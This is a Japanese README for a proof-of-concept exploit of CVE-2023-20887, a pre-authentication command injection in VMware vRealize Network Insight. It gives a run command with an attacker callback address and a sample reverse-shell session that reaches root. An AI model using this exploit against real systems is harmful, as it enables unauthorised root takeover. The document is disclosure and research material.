
VMWare vRealize Network Insight 事前認証リモートコード実行 (CVE-2023-20887)
CVE-2023-20887 の POC: VMWare Aria Operations for Networks (vRealize Network Insight) の未認証RCE
脆弱性の根本原因分析は私のブログでご覧いただけます: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

VMWare Aria Operations for Networks (vRealize Network Insight) は、Apache Thrift RPC インターフェースを介してユーザー入力を受け入れる際にコマンドインジェクションの脆弱性があります。この脆弱性により、リモートの未認証の攻撃者が root ユーザーとして基盤となるオペレーティングシステム上で任意のコマンドを実行できるようになります。RPC インターフェースはリバースプロキシによって保護されていますが、バイパス可能です。VMware はこの問題の深刻度を Critical と評価し、最大 CVSSv3 基本スコアは 9.8 です。 悪意のある攻撃者は、アプライアンス上で 'root' のコンテキストでリモートコード実行を達成できます。 VMWare 6.x バージョンは脆弱です。
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
最新バージョンに更新するか、Progress Advisory 内の手順に従って緩和してください。
このソフトウェアは、学術研究および効果的な防御技術の開発のみを目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用することを意図していません。プロジェクトメンテナは、ソフトウェアの誤用について責任を負いません。責任を持って使用してください。